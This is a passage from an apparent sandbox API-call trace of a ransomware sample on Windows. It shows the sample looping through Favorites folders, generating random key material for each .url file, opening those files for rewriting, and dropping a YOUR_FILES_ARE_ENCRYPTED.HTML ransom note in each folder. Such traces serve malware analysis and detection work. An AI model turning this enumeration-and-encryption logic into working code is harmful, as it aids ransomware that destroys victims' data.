ftLastWriteTime.dwLowDateTime=0x8a2e7d90, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0171.305] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0171.305] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.305] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0171.305] lstrlenW (lpString=".url") returned 4 [0171.305] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0171.305] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.306] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.306] CloseHandle (hObject=0x600) returned 1 [0171.306] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a30def0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 
[0171.306] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0171.306] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.306] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0171.306] lstrlenW (lpString=".url") returned 4 [0171.306] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0171.306] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.307] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.307] CloseHandle (hObject=0x600) returned 1 [0171.307] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a30def0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0171.307] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0171.307] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 
-1 [0171.307] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0171.307] lstrlenW (lpString=".url") returned 4 [0171.307] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0171.307] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.307] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.307] CloseHandle (hObject=0x600) returned 1 [0171.307] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0171.307] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0171.307] lstrcmpW (lpString1="Microsoft Store.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.307] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0171.307] lstrlenW (lpString=".url") returned 4 [0171.308] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0171.308] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: 
RandomBuffer=0x4ebdaf8) returned 1 [0171.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.308] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=134) returned 1 [0171.308] CloseHandle (hObject=0x600) returned 1 [0171.308] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0171.308] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.308] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0171.308] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.309] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 
1 [0171.311] CloseHandle (hObject=0x5f8) returned 1 [0171.311] GetProcessHeap () returned 0x270000 [0171.312] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.312] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0171.312] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned 43 [0171.312] GetProcessHeap () returned 0x270000 [0171.312] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.312] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites" [0171.312] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*" [0171.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.315] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.315] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0171.315] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0171.315] lstrcmpW (lpString1="MSN Autos.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.315] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0171.316] lstrlenW (lpString=".url") returned 4 [0171.316] PathFindExtensionW (pszPath="MSN Autos.url") returned=".url" [0171.316] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.316] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.316] CloseHandle (hObject=0x600) returned 1 [0171.316] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a3a6472, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0171.316] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0171.316] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.316] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0171.316] lstrlenW (lpString=".url") returned 4 [0171.316] PathFindExtensionW (pszPath="MSN Entertainment.url") returned=".url" [0171.316] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.317] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.317] CloseHandle (hObject=0x600) returned 1 [0171.317] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0171.317] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0171.317] lstrcmpW (lpString1="MSN Money.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.317] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0171.317] lstrlenW (lpString=".url") returned 4 [0171.317] PathFindExtensionW (pszPath="MSN Money.url") returned=".url" [0171.317] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.318] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.318] CloseHandle (hObject=0x600) returned 1 [0171.318] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0171.318] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0171.318] lstrcmpW (lpString1="MSN Sports.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.318] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0171.318] lstrlenW (lpString=".url") returned 4 [0171.318] PathFindExtensionW (pszPath="MSN Sports.url") returned=".url" [0171.318] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.318] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.318] CloseHandle (hObject=0x600) returned 1 [0171.318] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a35a1b1, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0171.318] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url") returned 51 [0171.318] lstrcmpW (lpString1="MSN.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0171.318] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0171.319] lstrlenW (lpString=".url") returned 4 [0171.319] PathFindExtensionW (pszPath="MSN.url") returned=".url" [0171.319] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.319] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.319] CloseHandle (hObject=0x600) returned 1 [0171.319] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0171.319] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0171.319] lstrcmpW (lpString1="MSNBC News.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.319] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0171.319] lstrlenW (lpString=".url") returned 4 [0171.319] PathFindExtensionW (pszPath="MSNBC News.url") returned=".url" [0171.319] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.319] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.320] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.320] CloseHandle (hObject=0x600) returned 1 [0171.320] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a380311, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0171.320] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.320] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0171.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\msn websites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.320] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.322] CloseHandle (hObject=0x5f8) returned 1 [0171.322] GetProcessHeap () returned 0x270000 
[0171.323] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.324] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0171.324] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned 43 [0171.324] GetProcessHeap () returned 0x270000 [0171.324] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.324] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live" [0171.324] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*" [0171.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.327] 
FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcc2f900, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.327] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc935d80, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc935d80, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0171.327] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0171.327] lstrcmpW (lpString1="Get Windows Live.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.327] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0171.327] lstrlenW (lpString=".url") returned 4 [0171.327] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0171.327] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.327] CreateFileW 